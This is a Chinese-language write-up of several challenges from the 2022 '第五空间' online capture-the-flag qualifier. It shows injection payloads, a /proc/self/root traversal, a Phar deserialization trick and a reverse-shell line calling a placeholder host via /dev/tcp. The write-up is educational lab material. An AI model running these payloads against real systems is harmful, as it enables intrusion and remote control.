2022 第五空间 线上初赛 部分题解
好累的一天。
Web
5_web_letmeguess_1
弱口令admin/admin123。
ping命令注入,%0a绕过分隔符。
发现存在kylin目录,目录下存在flag.txt,且WAF过滤了kylin和flag,使用*****绕过。
1 | 127.0.0.1%0acd${IFS}ky*%0atac${IFS}fl* |
5_easylogin
在username处存在宽字节注入,并且题目将union select替换为空,双写绕过,并且构造一个admin用户密码。
1 | POST /login.php |
5_web_Eeeeasy_SQL
\逃逸',mysql8 table注入。
1 | import requests |
登入后。
1 |
|
符号链接绕过。
1 | GET /api/flag.php?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag |
5_web_BaliYun
直接Phar反序列化。
1 |
|
上传完给一个路径读取。
1 | GET /index.php?img_name=phar://./upload/phar.gif |
MISC
sakana_reveage
1 | import os |
代码审计发现,sakana_upload和sakana_upload_sakanas存在条件竞争。
sakana_upload可控制写入路径,在sakana_upload_sakanas执行unzip之前成功写入就行。
上传恶意zip。
1 | from pwn import * |
上传正常zip。
1 | from pwn import * |
然后去手动访问就行。
5_Misc_m@sTeR_0f
1 | import random |
-interactive进入交互模式,绕过WAF。
1 | -interactive |
.shell执行命令反弹SHELL。
1 | .shell echo '/bin/sh -i >& /dev/tcp/x.x.x.x/x 0>&1' > /tmp/1.sh |